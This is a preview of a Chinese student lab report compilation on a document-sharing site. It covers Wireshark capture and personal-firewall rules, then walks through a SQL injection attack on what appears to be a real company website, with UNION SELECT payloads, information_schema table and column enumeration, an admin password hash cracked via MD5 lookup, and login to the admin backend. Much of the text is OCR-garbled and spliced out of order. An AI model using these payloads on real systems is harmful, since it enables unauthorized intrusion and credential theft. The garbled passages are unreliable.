网络安全实验报告综合.docx-淘文阁

资源描述

《网络安全实验报告综合.docx》由会员分享，可在线阅读，更多相关《网络安全实验报告综合.docx（39页珍藏版）》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。

1、网络扫描与网络嗅探-实验目的(1)理解网络嗅探和扫描器的工作机制和作用(2)使用抓包与协议分析工具Wireshark(3)掌握利用扫描器进行主动探测，收集目标信息的方法(4)掌握使用漏洞扫描器检测远程或本地主机安全性漏洞二实验环境Windows xp操作系统平台，局域网环境，网络抓包与协议分析工具 Wireshark,扫描器软件：Superscan三实验步骤使用Wireshark抓包并进行协议分析(1)下载并安装软件，主界面如图1所示。2）定义IP规则，这里是采用默认情况，如图2所示。低中高扩展自定义自定义工F规则|动作|名称帚西XI216，野始为|协议|方向|对方工p木马/间谍程序防御

2、Worm. BBEagle. m IP木马/间谍程序防御灰鸽子（内网通：工F禁止可疑网码禁止恶意网站- 1禁止恶意网站-2IPIPIP61 .129.112.70. 84.123.5218.83. 153. E允许自己用pin箭令探测耳他机器 ICMP允许路由器返回超时的工CMF回应f 1CMP允许路由器返回无法到达”的工CMP E ICMP任何任何任何防止别人用pin揄令探测ICMP任何程昌方发送到的本地端口号为20742的TCP数据包（这个端口是此蠕虫使从端口），拦截蠕虫试图从151下载一些可执行程序图23）下图是各个应用程序使用端口的情况，如图3所示。(4)下图就是日志，上面记录了程序

3、访问网络的记录，局域网和互联网上被IP 扫描端口的情况，如图4所示。图4天网防火墙会把所有不合规则的数据包拦截并记录到日志中，如果选择了监视所有TCP和UDP数据包，那发送和接收的每个数据包都将被记录。如139端攻击，139端口是NetBIOS协议所使用的端口，在安装了 TCP/IP协议的同时, NetBIOS也会被作为默认设置安装到系统中。(5)防火墙开放端口应用，打开68816889端口。建立新的IP规则，如下图，在自定义IP规则里双击进行新规则设置，如图5所示。增加ip规则数据包协议类型：TCPZJ本地端口r已授权程序开放的端口对方端口从k-到I5TCP标志位匠 FIN ACK p

4、SYN V/ PSH p RST V URG从6881 到6889端口为0时.不作为条件当满足上面条件时I通行ZI同时还审鸵录 r警告 I发声确定取消设置新规则后，把规则上移到该协议组的置顶，并保存。然后可以进行在线端口测试，这些端口是否已经开放的，如图6所示。天网防火塔个人版-xra安全级别：自定义 O低中芸扩展自定义自定义工P规则由爵X旦恸作性称BTTCP禁止所有人连接TCP口口 0DH000000 允许DNS （域名解释）UDP允许已经授权程序打开的端口UDP允许局域网内的机器取你的机器的名称UDP 防止互联网上的机器探测机器名称-1 UDP 允许局域网内的机器取你的机器的名称UD

5、P 防止互联网上的机器探测机器名称-2 UDP 允许DNS （域名解释）UDP西LiLtl凸liLbLtlLtlLtl曲LSI（6）应用自定义规则防止常见病毒。下面是防范冲击波病毒的实例应用，冲击波就是利用WINDOWS系统的RPC服务漏洞以及开放的69、135、139、445、4444端口入侵。图7就是禁止4444端口的小意图。园增加ip规则数据包协议类型：TCP2J本地端口r已授权程序开放的端口从 |4444到 |4444对方端口从到一TCP标志位V/ FIN r ACK厂SYN 厂PSHF RST 厂 URG端口为0时，不作为条件当满足上面条件时同时还厂鸵录r警告 r发声取消确定封锁6

6、9端口，如图8所示。图8建立完后就保存，保存完后就可以防范冲击波病毒了。六、实验总结通过本次实验，我知道了一般软件防火墙的使用与配置。可以使用该软件监听各个应用程序使用端口的情况，查看哪些程序使用了端口，使用哪个端口，是否存在可疑程序在使用网络资源。通过新建IP规则，并且进行自定义，对某些端口进行封锁，以禁止某些IP访问自己的计算机，之后保存，可以通过此方法来保证计算机的安全。某网站重置密码漏洞及攻击实例-实验目的(1)理解网站攻击原理(2)理解网络攻击时使用工具的原理(3)熟练使用网站攻击工具实验环境操作系统：Windows 8解密工具：MD5检测工具：啊D浏览器：2345王牌浏览器

7、三实验步骤(1)寻找可以注入网站网址：使用检测工具，啊D扫描注入点，显示如图1所Zo（3） SQL注册检测，扫描表段，显小结果如图2所不。(4)从表段检测字段，检测结果如图3所示。JDilAIM V2.23 无限制版 QQ9269563 I I It 讯AH9 I 除 M9 I 附讯钝邮后自相扑http/www,d99netnetl一.一皆一；.富一| mil.口渐：1泡】免费注入检测沐人谆摘 bjbinn*l c cn/donetnet啊a注入工热httf/www.d99neLnetUiJlWdilMMnu球股归聆收w- l *-Lf k| !13天猫fl网上超市。秒杀推荐：Links胭9

8、k9k网页游点Haol23网如意海看图搜片| 国 inurl:index.php?id=3SS x 广验马集团验马箧团x I .诉0中心打造价值集团,铸就百年品精Io biMd 壮、38 2 groap cmI a hixiored yen the OfardtW?2a -日 N GCMH、HM 6 K新间中心x I . x却牝饮与即然苦穿W用IB/W友宫左WjW 二子星公产亍及卫博立遂X省遐：3W三嗖、二十苍W语事W衣三派与我正交二亍工,人正、冬花、塔显过三转一9名超水、=.i. r辱基七次把壬名.苧：法彳仔GW现七次三工三冬六“ 三疑一迫彳支3省了3孑运6下，设刁一汽宝叁充 70

9、-ifi-甘空对广士0,嘴手代叁餐=当更优“？妄言.彳堂看亍二二改医=胃亍“仁汽3H；3W与匕Xhttp:www.ju|jnjpj(!m(ypjpn/news main.php?id=47建I网上超市e秒杀推荐Links雅9k9k网页游鼠Haol23网幻如意漫匚看图搜片inurl:index.php?id=百=素裟马集团x袈马集团打造价值集团，铸就门F品牌To build the value of group.cau a hundred ywn the brand新词中心 NS新闻中心要沼析何行业新低 eSKJMS发布时间您的包A ：百我做g中O 第二步：进一步验证此链接是可以注入的。(

10、与运算)(1)在注入点后加“+and+l = l”页面显示正常，如图3所示。1 http;/wwwjgnmMenieomCT/newsjnaln.php?id=47+and+l=l./天强I网上超市。秒杀推荐L Links昭9k9k网页游鼠Haol23网Q如意海看图搜片x|骚马集团短马集团联系我们L CONTMTUS.新闻中心 ss切相 as 酬冲o 9tssm北喊马时汽年城店面汨用发同因:2024-03-211006:57N.我不实&宫尊公三七子名.此产产笈区二总之号第兜.3：eS苞运3%国清戌七.仪否/交七亍二人3、邕汽、*?；电总号一分更毛X、W、珞、于有其正口汽?备.Wk笠三三之三

11、茶W昆尊千父三尊义广老M2W.，义三女E专谡。工定W金:发三W .*.二公年京考-c-j 吉亘=t士线,丁毛于汽三要亍攵mw：s方京w. S*5=jtT： 5S?=ZlSS-5-：j _ 电2 027-R80Z7299 027 R8029781 传M . 027 M0Z72991SSS junfrid jdrrwlT3xovn图3(2)在注入点后加“+and+l=0，页面显示错误，如图4所示。 httpy/wwv? main.php?id=47+and -DS TI网上超市Q秒杀推荐Links履Qk9k网页游行业斩间第三步：获得字段数在注入点后面加入“+order+by+l”，页面显示正常，如

12、图5所示。i天猫F1网上超市 e秒杀推荐Links Wi9k9k网页游屋Haol23网&如意淹匚看图搜片( ONFACI US SK1M5边马集团;n -省送：027-M027299027-M029781传H： 027- 88027299*际：JUINTM jdrnnl63.COm新闻中心ZTx mEB一一 1331 一?CMrsl 0T.时您马随用汽车城店面兆租: X14-O3-21100&574三关a君王公司，亡于陵.远子年氏区 m4瑛二谷z wfx文.3套三更、区一方正公费芸陵发次号奈希交:二子二,人芭、力3、f?息盅三芸一分更复.X、三誉、子等圣上壬基.惠北出力计为在W隹再产沃

13、区冬衣大型.芸中还姜月安后芍肃公司建运二二蓑三W :卢兰京吉公W星专 70T5S1生亘七上篁.N弓于京名耍亍纪五石S吉会吉.Wk要+H下：卡套其于工案】853=*：声生:SWm竽及k(2)图5注入点后面换成“+order+by+20”，出现错误界面，如图6所示。I http;/Wwviiiftiiifeiiftjgijynews_maM.php?ld=47+0rder+by+10己8I网上超市。秒杀推荐 Links糜9k9k网页游鼠Haol23网 5如意海看图慢片inurl:index.php?id=g螃索刀演三案回二臼毂马集团柒团旗党新闻和志外襄务合作搭造土中义 | tngbih去系物

14、：打造价值集团，铸就I2 build the value of group, cast hundred yran N brand期的长4320 惭同中J 新闻中心发布封同(3)用二分法进一步判断出现错误的字段数，再注入点后面换成:“ +order+by+l 0 ”, “ +order+by+5 ”, “ +order+by+8 ”, “ +order+by+9 ”,页面均显不正常，说明，正确的字段是123,4,5,6,7,8,9。如图7所不。乂仟t) main.php?id=s47+order+by+9夕，Si秘门网上超市。秒杀推荐Links糜9k9k网页游屋Haol23网均如翳匚

15、看图嗖片x验马集团新玩中心电卜业务inurl:index.php?id=_BM$ x 建马集团7TE工XiJw 华画侬X I / 玄务合作招蝌t联系疣门新闻中心 -WS念的as新包中心复郭后湖腌次布 2014-03-21 1006:57冠笠彳左显有煤公W.位于避居产开发区.效宏北范方专区京比.316M或.次一英石公普膜定豉引次丹信路文汇于此.人汽.三洸 *萼宽堂费士分便珂.电磐.党等茶花;节三名.呵缶方三发区争殳文缰.至佞釜5SG笑Z有耳公二:发M方汽工. *公E荻有 :cxor 3五外自理.W角子汽主县予fCM斓S有否言.把金县手工下汽主会=沈于16开ml汽左3s生面于522c *

16、第四步：获得显示位再注入点后面加入 “+and+l=2+union+select+123,4,567,8,9”，如图 8 所示, 显示的数字即是显示位：2, 4, 7=L234567899，6 圈ri网建市Q秒杀推荐L Links糜9k9k网页游屋Haol23网幻如好- 看图搜片x 阕 inurl:inde)cphp?id=百度搜索 x袈马集团弹马集团x 11 . x湾外业务商务合作侬纳士联豺捌J打造价值集团，铸就ri年品牌 To build the value of group.cast a hundred years the brandX新网中心新闻中心 NEWS新闻中心必打位：苜玄妒

17、亘Q心A臭团新词行的淘图片新词发砌洞：7叵第五步：获得该网站数据库的名字、版本、数据库所在路径等下面是获得数据库信息的一些函数：user()数据库用户名database()当前使用的数据库名version()数据库版本datadir()或datadir数据库数据所在路径65。(1次()或650出数据库安装路径在出错的字段位置加上上面的函数，即可获得相对应的信息，如图9所示3 main.php?id=47+and+l=2+union+select+Luse03Nersion0,5,6, 夕天猫I网上超市 e秒杀推荐 LI Links糜9k9k网页游鼠Haol23网因如意海看图搜片副inur

18、l:indaphp?id=a9。x1验马集团X卜独马集团x J打造价俏集团，镂就门品牌Io Ixjlld the value of gfoup, cat hundred yz lb Band中攵 | English菖贡案比楔5新湿中心海外业务商务合乍招胸士联系我们：时新闻中心jmjt_flocalhost发布时用：/Vdr/lib/riyujl同CONTACT US钿:027 88027299 027-880297B1传鼻：MSB jMnmd adminQtl第六步：获得当前使用的数据库名的hex值，并暴漏该网站数据库的字段名(1)数据库名的还原需要使用协助工具：小葵多功能转换工具，把当前

19、使用的数据库名Jmjt转化为：0x6A6D6A74,转换结果如图10所示。(2)注入点后面加下面的公式获得数据库的字段名:“ +and+l=2+union+select+l,GROUP_CONCAT(DISTINCT+table_name),3,4,5,6,7, 8,9+from+where+table_schema=0x6A6D6A74 (数据库表名的 hex 值) GROUP_CONCAT(DISTINCT+table_name)放在显示位即可获得相对应SQL数据库中的字段名，如图11所示。报表中的具体字段显示如图12o”文件堂看我3 http:www.junmaren8mcn/new

20、s main.php?id=47+and+l=2+union+select+LGROUP CONCAT(DL. 囹口天猫I网上超市。秒杀推荐 D Links糜9k9k网页游 Haol23网均如意海匚1看图搜片验马集团x 国百度下，你就1X 。.。的空间http:25. xj圈百度一下,你炳1道x打造价值集团，铸就品牌新闻中心NEWS新闻中心To build the value of group cast a hundred years the brand伊%JE :百页所说中心、发布时司：7圜4图11hq_gsgLhqxwm,hq_news,hq_useradmin,hq_ware,h

21、q_web,jm_hr,jm_hr_jLjm_hr_sortJmJtgLjmxwmJm_new5,jm_news_sortJm_syimg,jm_yqlj,useradmin,、,useradmin,web,xnfy520junmajituan_address,xnfy520Junmajituan_advert_category,xnfy520Junmajituan_advertJist,xnfy520Junmajituan_brand,xnfy520Junmajituan_car,:,xnfy520Junmajituan_advert_listfxnfy520Junmajituan_bran

22、dlxnfy520Junmajituan_car,xnfy520Junmajituan_color,xnfy520Junmajituan_exe第七步：在所有的字段中找数据库管理员的用户名，并获得hex值找到管理员的字段名（管理员：administrator）猜测：这个很显然就判断是useradmin （大多数），因为大多数人都是admin、 user、Pass等一些常用单词搭配一起标记。把管理员的字段名再次使用小葵多功能转换工具获得其hex值，如图13所 Zo新闻中心NEWS集团S近行岬笈零片新温：打造价值集团，铸就ii年品牌To build th。value of group,新闻中心K

23、| English期概莫硒用0海外峥商务合作招受虹联至我(00 7te(Y)您的B -艺灵新宜中心,发布时问：7CONTACT US电运：，专真：H4第八步：借助管理员用户名的hex值，获得字段useradmin的子字段注入点后面加下面公式获得管理员的子字段：a+and+l=2+union+select+l,concat(GROUP_CONCAT(DISTINCT+column_name) ),3,4,5,6,7,8,9+from+where+table_name=0x61646D696E (管理员用户名的 hex 值)concat(GROUP_CONCAT(DISTINCT+column_

24、name)放在显示位获得的子字段显示如图14所示。I http:wwwJunmaren main.php?id=47+and+l=2+union+select+LcorKat(GROUP CO /臼)(圈 :全Si天|网上超市。秒杀推荐L Links Wi9k9k网页游Haol23网&J如意海看图溟片里马集团（4） TCP三次握手过程分析（以第一次握手为例）主机0发送一个连接请求到（），第一个TCP包的格式如图4所示。Filter： | tcp | Expression.Clear ApplyTime(Source(Destinati on(Protocol |Length|lno工Uz. y

25、yyzuub4HTTPS4Lget nttp :/ww. nao-1106TCP622804-8080 SYNse1 107TCP628080-2804 SYN,AC108TCP542804*8080 ACKse109HTTP588GET 。110TCP1514TCP segment ofa111TCP1514TCP segment ofa112TCP542804-8080 ACKse11勺17 41H744n1 77 1 A n 11 77 1 A 1 A4ITCP1 S1 4Ftcp ： pnttipnr cfS Frame 106: 62 bytes on wire (496 bits)

26、, 62 bytes captured (496 bits) on interface 0S Ethernet II, Src: f8:0f:41:6f:ed:0e (f8:Of:41:6f:ed:Oe), Dst: 00:le:c9:ae:8e:ea (00:1 国 Internet Protocol version 4, Src: 172.16.1.64 (172.16.1.64), Dst: 172.16.0.1 (172.16. + Transmission control Protocol, src Port: 2804 (2804), Dst Port: 8080 (8080),

27、seq: 0,4Ij00000010002000306 a 4 0 2 0 8 0 3 2 f 8 3 o a o o o eo9o e of o8 4 10 ea 4 4 a 5 f 5 9b ad c 3 o o eolf 13 of o oof o oof0 0 2 olo 5 c o 4 3 7 0 0 0 2 0 4 0 0 8 10 4 o o o o e o o 1 o 1 o o d c o 1 e a o o feob 4 obb 10 7 54 Ob o AO.o；z. .T图4第三行是ipv4的报文，网际协议IP是工作在网络层,也就是数据链路层的上层, IPv4报文中的源

28、地址和目的地址是ip地址,版本号TCP是6,其格式为如图5所2JI2J+ ETTTBTTTeT-TTbrc ；-i b ； ui :4_l ； 5 ； TU ； (J b ； ui ； bl ； TU : uEJ,ub l i-uU:j匕- 耐新闻中心三NEWSadminadmin 发刊报：7开始载图(Y)bla9337bc2elab6bd832*02ci92ab6图片新闻图15第十步：进一步把十六进制显示的密码的密文进行解密使用下面的MD5解密工具的链接把密码的密文解密，使用网址：或者，把十六进制显示的密码的密文输入编辑查询框中进行查询，查询结果如图16所示。使IVIUJ Zx。 5VI

29、LO乐市史WT , 口5更J余就至g异力，史初J壬部用L效牯口,前HgD反is卦邺相。输入让你无语的MD5“幅越图(Y)声明：责任:本站所提供的信息、技术及服务仅可用于信息安全评估和受码学研究，严禁用于非法用途，如有违反本站不承担任何责任！旨)困削E1狙击I：舒羽”以爵吻词恭喜，该密文已被SOMD5解密!明文88027299此明文由，Hg4nmKH4(K提交取美丽勺缘/ 用食1 0小费图16最后一步：使用“啊D”工具扫描后台,(1)打开“啊D”工具，点击“管理入口”进行扫描(2)找到管理员的登陆界面如图17所示，输入账号和密码可进入该网站的后台如图18所不。登陆信息网后台管理乐点创意科技有限公司Ledi anchuangyi kej iyoux iangongsi1-时间造就我们，最优秀实力

展开阅读全文